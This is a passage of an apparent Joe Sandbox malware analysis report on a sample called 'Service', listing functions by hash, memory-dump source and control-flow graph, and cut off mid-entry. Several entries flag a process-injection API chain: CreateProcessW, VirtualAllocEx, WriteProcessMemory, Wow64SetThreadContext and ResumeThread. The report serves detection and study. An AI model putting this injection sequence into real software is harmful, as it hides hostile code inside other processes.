                                • API String ID: 963392458-0
                                • Opcode ID: 92760079413508393f5f7cdd06c9a74b7f1f7041df49d7ccf6d428b3ac87f9e1
                                • Instruction ID: d51fd21bf7a91b468a794769c20156b8025581294849ae974dd034b8961cbeb1
                                • Opcode Fuzzy Hash: 92760079413508393f5f7cdd06c9a74b7f1f7041df49d7ccf6d428b3ac87f9e1
                                • Instruction Fuzzy Hash: B281D375D0022ACFDB21DFA5D980BDDBBF5AF49300F1491AAE509B7260EB309A85CF54
                                Function 02D81BA8 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 711 2d81ba8-2d81c33 712 2d81c4a-2d81c58 711->712 713 2d81c35-2d81c47 711->713 714 2d81c5a-2d81c6c 712->714 715 2d81c6f-2d81cab 712->715 713->712 714->715 716 2d81cad-2d81cbc 715->716 717 2d81cbf-2d81d8c CreateProcessW 715->717 716->717 721 2d81d8e-2d81d94 717->721 722 2d81d95-2d81e54 717->722 721->722 732 2d81e8a-2d81e95 722->732 733 2d81e56-2d81e7f 722->733 737 2d81e96 732->737 733->732 737->737
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D81D79
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: dfba643b0eb70f9013fc4926808511e019aed5de531b3deaa3bf47adc47975b9
                                • Instruction ID: 5624ffe2a1fc322b1d5542455af9a7325ddbbce164c59c87857aaaa4569189d8
                                • Opcode Fuzzy Hash: dfba643b0eb70f9013fc4926808511e019aed5de531b3deaa3bf47adc47975b9
                                • Instruction Fuzzy Hash: 2D81C075D0026ADFDB21DFA5C880BDDBBF5AF49300F1091AAE508B7260DB709A89CF54
                                Function 02D84E40 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 738 2d84e40-2d84ecb 739 2d84ecd-2d84edf 738->739 740 2d84ee2-2d84ef0 738->740 739->740 741 2d84ef2-2d84f04 740->741 742 2d84f07-2d84f43 740->742 741->742 743 2d84f45-2d84f54 742->743 744 2d84f57-2d85024 CreateProcessW 742->744 743->744 748 2d8502d-2d850ec 744->748 749 2d85026-2d8502c 744->749 759 2d850ee-2d85117 748->759 760 2d85122-2d8512d 748->760 749->748 759->760 764 2d8512e 760->764 764->764
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85011
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: b042679747aa68745a57c4b8478172e581fcaf8477b259178ab3bccb7a893b13
                                • Instruction ID: bfa97fc15b8f70134273659891452e2d9f2c4c4871b9d50dada5cd3f4ffdf487
                                • Opcode Fuzzy Hash: b042679747aa68745a57c4b8478172e581fcaf8477b259178ab3bccb7a893b13
                                • Instruction Fuzzy Hash: 5081C075D0026ACFDB20DFA5D880BDEBBF5AB49300F1091AAE508B7250DB709A89CF54
                                Function 02D85C78 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 765 2d85c78-2d85d03 766 2d85d1a-2d85d28 765->766 767 2d85d05-2d85d17 765->767 768 2d85d2a-2d85d3c 766->768 769 2d85d3f-2d85d7b 766->769 767->766 768->769 770 2d85d7d-2d85d8c 769->770 771 2d85d8f-2d85e5c CreateProcessW 769->771 770->771 775 2d85e5e-2d85e64 771->775 776 2d85e65-2d85f24 771->776 775->776 786 2d85f5a-2d85f65 776->786 787 2d85f26-2d85f4f 776->787 791 2d85f66 786->791 787->786 791->791
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85E49
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 9e2c94f744cdd1430a6aba094f2aec6e971d34ea9a8c9932cd8d108609904334
                                • Instruction ID: c07b2e82045ecae1dea323ed59f56b9295e9842b1f864e6b7e6fa7130c8a14f9
                                • Opcode Fuzzy Hash: 9e2c94f744cdd1430a6aba094f2aec6e971d34ea9a8c9932cd8d108609904334
                                • Instruction Fuzzy Hash: A181E275D0022ACFDB20DFA5D880BDDBBF5AF49300F1091AAE509B7260DB309A89CF54
                                Function 02D821F0 Relevance: 1.6, APIs: 1, Instructions: 111injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 792 2d821f0-2d8225f 793 2d82261-2d82273 792->793 794 2d82276-2d822d6 WriteProcessMemory 792->794 793->794 795 2d822d8-2d822de 794->795 796 2d822df-2d8231d 794->796 795->796
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D822C6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: e8b222a5380acc9849c59f2ef4057c54905e3a17429d13462073c7a121c6a944
                                • Instruction ID: d9a3f48de54f60aae4a6479a59fa3adb5c97f11343a173668951ca7773a4b4df
                                • Opcode Fuzzy Hash: e8b222a5380acc9849c59f2ef4057c54905e3a17429d13462073c7a121c6a944
                                • Instruction Fuzzy Hash: 914166B5D002599FCB10CFA9D984ADEFBF1BB49314F24902AE818BB350D375AA45CF64
                                Function 02D821F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D822C6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 00bbcf3df6137de7733b2366205ca531afe6eb9a125b7563896d2fd8648bc6e6
                                • Instruction ID: 6393c94c8d65b870145606e4717236049756c5307938e1fe9aaf9bc49ad384a7
                                • Opcode Fuzzy Hash: 00bbcf3df6137de7733b2366205ca531afe6eb9a125b7563896d2fd8648bc6e6
                                • Instruction Fuzzy Hash: 314177B5D002589FCB00CFA9D984ADEFBF1BB09310F24902AE818B7310D375AA45CF64
                                Function 02D81FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D82085
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 1ad62b8b8afe4dcdb7d875f3c0a3fec3b342be90c327df8a39df8b0fba3a5460
                                • Instruction ID: a27488ebfa3b758fd18aa3b66d5870fdd622564fb192b1aafc0c3133efd09ab9
                                • Opcode Fuzzy Hash: 1ad62b8b8afe4dcdb7d875f3c0a3fec3b342be90c327df8a39df8b0fba3a5460
                                • Instruction Fuzzy Hash: B63166B9D042599FCF10CFAAD984ADEFBB5BB19310F10A02AE814B7310D375A945CF69
                                Function 02D81FD0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D82085
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 64d548bf00b86522fd38d1b8841ed897522520680c20eeaffc83127dc7a295ee
                                • Instruction ID: d1117a2da67abe89ca1490afd6c057c136b7fff8dd9940290208cbef25f62909
                                • Opcode Fuzzy Hash: 64d548bf00b86522fd38d1b8841ed897522520680c20eeaffc83127dc7a295ee
                                • Instruction Fuzzy Hash: 1D3177B9D042599FCF10CFAAD984ADEFBB1BB19310F14906AE818B7310D375A945CF64
                                Function 02D820E8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D82195
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: bbb80c147db51f019543923542ae7a9d6bab3c8a5c721009bf8dad310f5a1791
                                • Instruction ID: 56083d4ce27b81fc5147e08704571ba3e1f289274684db1efaa7102103dfef93
                                • Opcode Fuzzy Hash: bbb80c147db51f019543923542ae7a9d6bab3c8a5c721009bf8dad310f5a1791
                                • Instruction Fuzzy Hash: 933184B9D002589FCF10DFA9D984A9EFBB5BB09310F20A02AE914B7310D335A945CF68
                                Function 02D820F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D82195
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 4436a8b604c9b80f716a344e9fc3b33213bb2ac0cfd919dc7e3e78509cf62af5
                                • Instruction ID: 7b37d6b7d0232394d30c67d4deb17c190fa299b214f7a366a0408efa15ea3e5d
                                • Opcode Fuzzy Hash: 4436a8b604c9b80f716a344e9fc3b33213bb2ac0cfd919dc7e3e78509cf62af5
                                • Instruction Fuzzy Hash: E13154B9D042599FCF10CFA9D984A9EFBB5BB19310F20A02AE914B7310D335A945CF65
                                Function 02D81EC1 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D81F72
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 703d6111d9ecc9d19cf8b31fe3f4075b7102490e1ba22bf7f81c0a97d3024efb
                                • Instruction ID: 0c6158d618468f5556f54fc33e44506ecbd68ae8ea6b9f0a770e3c8c8d30876c
                                • Opcode Fuzzy Hash: 703d6111d9ecc9d19cf8b31fe3f4075b7102490e1ba22bf7f81c0a97d3024efb
                                • Instruction Fuzzy Hash: 18319DB5D012599FCB10DFAAD584ADEFBF1BB49314F14802AE418B7350D378AA49CF54
                                Function 02D81EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D81F72
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5c4b0638ce18c49fcb4176970c8a921a08c848fcb4e253eede86f2cdd0122f8e
                                • Instruction ID: d9495466847c2073b99fb64fa393557380ef6f60977c69b80fbe1b44baa12416
                                • Opcode Fuzzy Hash: 5c4b0638ce18c49fcb4176970c8a921a08c848fcb4e253eede86f2cdd0122f8e
                                • Instruction Fuzzy Hash: 72319BB5D012599FCB10DFAAD984ADEFBF1BB49314F24802AE418B7350D378A949CF64
                                Function 02D82331 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02D823AE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 6cc56f73345ba1e21119e7b925ab081053e86fe645d1340730fecd0f9879d5bd
                                • Instruction ID: 15b6005ac4a73d4e78436ad71926c8093658830b1075decaf5400aebba47680d
                                • Opcode Fuzzy Hash: 6cc56f73345ba1e21119e7b925ab081053e86fe645d1340730fecd0f9879d5bd
                                • Instruction Fuzzy Hash: AC2197B8D002499FCB10DFA9D884A9EFBF4AB09320F24901AE858B7310D375A945CFA4
                                Function 02D82338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02D823AE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 2ae7f8ff3e9490467e6f2c92aa7a95827e227bf872bd398e24ce81ab18e9b69a
                                • Instruction ID: 1e66ea32685746d66c95a3cb14627d96cea1b583370503834ae6524d227b49bc
                                • Opcode Fuzzy Hash: 2ae7f8ff3e9490467e6f2c92aa7a95827e227bf872bd398e24ce81ab18e9b69a
                                • Instruction Fuzzy Hash: CB21A8B8D002499FCB10DFA9D884ADEFBF4BB09320F20901AE818B7310D335A945CFA4
                                Function 02B7D5B8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1705468466.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2b7d000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d73b057ab11f0fa8d818b6f1d67bdcc4e8f5dba5e49f5ae52ce56330982c3857
                                • Instruction ID: 5eafb7a82c3eb3342ff1cae7cb311fda02fe5e077ee15d22c306d434df80d99a
                                • Opcode Fuzzy Hash: d73b057ab11f0fa8d818b6f1d67bdcc4e8f5dba5e49f5ae52ce56330982c3857
                                • Instruction Fuzzy Hash: 332122B6604305DFDB05DF10D9C4B26BF65FF88364F2085ADE80A0B256C336D456CBA2
                                Function 02B7D5B3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1705468466.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2b7d000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction ID: e9ab9df005b8de63e67730ab20acea6be8fc1b1567704350aaa5ca49c3962807
                                • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction Fuzzy Hash: 2611BE76504284CFCB16CF14D9C4B16BF72FF84324F2486A9D8090B256C33AD45ACBA2

                                Executed Functions

                                Function 026913C3 Relevance: .3, Instructions: 280COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bb7fea69c2877893d739a3803d946bee8d05a84dffb9ab7f5011b9b13673a59
                                • Instruction ID: 99000584abaf12fdc6105d6fbe0306b731b951c9220fcdfd8e1657dc952e37a3
                                • Opcode Fuzzy Hash: 0bb7fea69c2877893d739a3803d946bee8d05a84dffb9ab7f5011b9b13673a59
                                • Instruction Fuzzy Hash: 88917234F042198BDF0CAB7598547AE77B6BFC9740B29C5AEE406DB294CE349802CB91
                                Function 02691010 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70eec1b4e85dd27671dceeb9c6e98dccbc0a7017005b9772c8113d323a46d0f5
                                • Instruction ID: 586db1f787aafee45b2b41c9b50e39b6cb9813031758815bf98c64163daf9308
                                • Opcode Fuzzy Hash: 70eec1b4e85dd27671dceeb9c6e98dccbc0a7017005b9772c8113d323a46d0f5
                                • Instruction Fuzzy Hash: 3E514C346003068FDB0ABB74F85876E7BE2BB846017018A6DD406C77A5EF38AD05CB91
                                Function 0269100B Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a04a7aa03028e29d99b149f4404afbd2ff1218cce2748e7f8c8a5d1cbc4f1f
                                • Instruction ID: 77aeac1ae72a0afbb60b8ff6a62687fa145f124afc67008d449e7afb050ca3da
                                • Opcode Fuzzy Hash: c9a04a7aa03028e29d99b149f4404afbd2ff1218cce2748e7f8c8a5d1cbc4f1f
                                • Instruction Fuzzy Hash: 4E512A346103068FDB0ABF74F85876E7BE2BB886057018A6DD416C77A5EF38AD05CB81
                                Function 02691973 Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: daaa13a9ca8938691126d2a2d9428d31689eeeede0b860dcea172bc0d53f648b
                                • Instruction ID: 134a9f7e808fcf5c3ffd8d3b9c9a13e34f19ad3e2d76816a031da15eef429984
                                • Opcode Fuzzy Hash: daaa13a9ca8938691126d2a2d9428d31689eeeede0b860dcea172bc0d53f648b
                                • Instruction Fuzzy Hash: F8310531B0115A8FDF48DB79985467E7BF6ABC9200B2484AAE409DB381DF718D06C791
                                Function 02691157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 50f3a7cf3bb8cf2b9dd73240a2fbae6489ffe6ab6b9843b35d4f3bbf02705287
                                • Instruction ID: 20dc13aff01c7356a6f4a958ca1ef39231c072ff4ae04063ad7c44eafd94e489
                                • Opcode Fuzzy Hash: 50f3a7cf3bb8cf2b9dd73240a2fbae6489ffe6ab6b9843b35d4f3bbf02705287
                                • Instruction Fuzzy Hash: 4C31B031700B058BDB59AB79982473E7AE6BFC45443508A6EC01BCB790DF35EE059BD2
                                Function 0269186B Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 372a0419126ea98e47449e25fdcf8cbca8319dd50a6622f13f0c2c7e9d03b99b
                                • Instruction ID: 821cad171820862975d0ecb52f1c61d2a3f3294b452196f0e0b346b2f02cb68e
                                • Opcode Fuzzy Hash: 372a0419126ea98e47449e25fdcf8cbca8319dd50a6622f13f0c2c7e9d03b99b
                                • Instruction Fuzzy Hash: D4219171B002099FDF14EBB9885476EBBEAEFC8640F24846ED50AD7381DE349D0697A1
                                Function 026912CB Relevance: .1, Instructions: 83COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a70ae11edb5419d84bba292b42e00cb663409f33177ff1e21cb56cfd3f4be682
                                • Instruction ID: 1b92a76cb0cb6c8f5a0339ae06846a02de935ba7e7c6c52bc2a9c25418537274
                                • Opcode Fuzzy Hash: a70ae11edb5419d84bba292b42e00cb663409f33177ff1e21cb56cfd3f4be682
                                • Instruction Fuzzy Hash: 59217C347001159FDB44EB79D854B6E7BE2BF89750F2444A9E505EB3A6CA729C028790
                                Function 02691743 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77896f25a6783074f0795c35d295e8c4f51732a23cce62f6ae8c71ff9e9be0ad
                                • Instruction ID: 87b70cccd12266b2760592b178e1de79666591519409855871b81c3c082bdc9b
                                • Opcode Fuzzy Hash: 77896f25a6783074f0795c35d295e8c4f51732a23cce62f6ae8c71ff9e9be0ad
                                • Instruction Fuzzy Hash: F1316D74A10309DFEB45FBB8D8547ADBBB2FF89301F10856AD405AB345DB385A44CB91
                                Function 02691750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 464aca8a1c746d67ea624f04d766241a895eeaa98d30d7bc101293db96c4c64a
                                • Instruction ID: e9e566bb6848981b76ed9710fb4086d601e715c1d42b6f73fe5c7dbaf6546ef5
                                • Opcode Fuzzy Hash: 464aca8a1c746d67ea624f04d766241a895eeaa98d30d7bc101293db96c4c64a
                                • Instruction Fuzzy Hash: 7A216B74A10309DFEB45FBB8D8447ADBBB6FF88701F108A69D405AB345EB386A44CB51
                                Function 0269083B Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95c695f5ad843ab41cce01aae19c3071068e95e6dfb3267b91f3243aac34cbcf
                                • Instruction ID: 85b237226cacee33e8a90b0b573583736d00d9d2ae55208bd22b1c204e66c34c
                                • Opcode Fuzzy Hash: 95c695f5ad843ab41cce01aae19c3071068e95e6dfb3267b91f3243aac34cbcf
                                • Instruction Fuzzy Hash: 0C219D741213558FEF02FB28FD80A553BA5FB89605B01DA6CD8148B22FD77C6D0ACB81
                                Function 02690848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 50d2edc0a317511759660b1d653f1a7ceb2158d36053410c22f1d81b4332a1f8
                                • Instruction ID: a8075728ab442163d6bff9b8a2bff619ee10a19a6827917ea8a7e2b5e20a6f15
                                • Opcode Fuzzy Hash: 50d2edc0a317511759660b1d653f1a7ceb2158d36053410c22f1d81b4332a1f8
                                • Instruction Fuzzy Hash: C8117D741213169FEF02FF28F980A557BA5B788605700DA6CD8148B21FD77C6906CF81
                                Function 02690939 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1733502635.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_2690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb1835ea9cca6a92c1073337b455e79b87b124459e0fa1be65ef546ef58db658
                                • Instruction ID: 697ba990ab6f5363e416020eb39cad243f705dbd1fef6458f9ffdba9bcb585c6
                                • Opcode Fuzzy Hash: bb1835ea9cca6a92c1073337b455e79b87b124459e0fa1be65ef546ef58db658
                                • Instruction Fuzzy Hash: BA019630B042048FDB08EBB498657AD3BE6DFC5300F5480BD84059B3D5DE384D4AD791

                                Executed Functions

                                Function 00C11980 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID: q_}
                                • API String ID: 0-1077432412
                                • Opcode ID: 9cd8a063d428770bece96599e4931d7d40df09ac978db2b17997e9d8df3f8618
                                • Instruction ID: 83686d27a0a28d6e49373d94e2130dcc4fd08a7510693c0334942f0d2c722041
                                • Opcode Fuzzy Hash: 9cd8a063d428770bece96599e4931d7d40df09ac978db2b17997e9d8df3f8618
                                • Instruction Fuzzy Hash: AA518D30B052458FCB04EB3994546BE7BE6EFC6711B5884AED946CB382DF358C069791
                                Function 00C10D95 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75b883f74eafa0a60b0a04647422e9c9db89a2ba045acee7357a5b1e2114e876
                                • Instruction ID: 08fe4e7cdfe185fbb9b54a6ff82ff40bf8f19ef87f7b18ad8f2e6a606aa009d9
                                • Opcode Fuzzy Hash: 75b883f74eafa0a60b0a04647422e9c9db89a2ba045acee7357a5b1e2114e876
                                • Instruction Fuzzy Hash: 3051AB306053458FDB05FB38E8A896D7BA2BF8D2013008A6DD44BCB2B4EF309D088F91
                                Function 00C11010 Relevance: .2, Instructions: 248COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
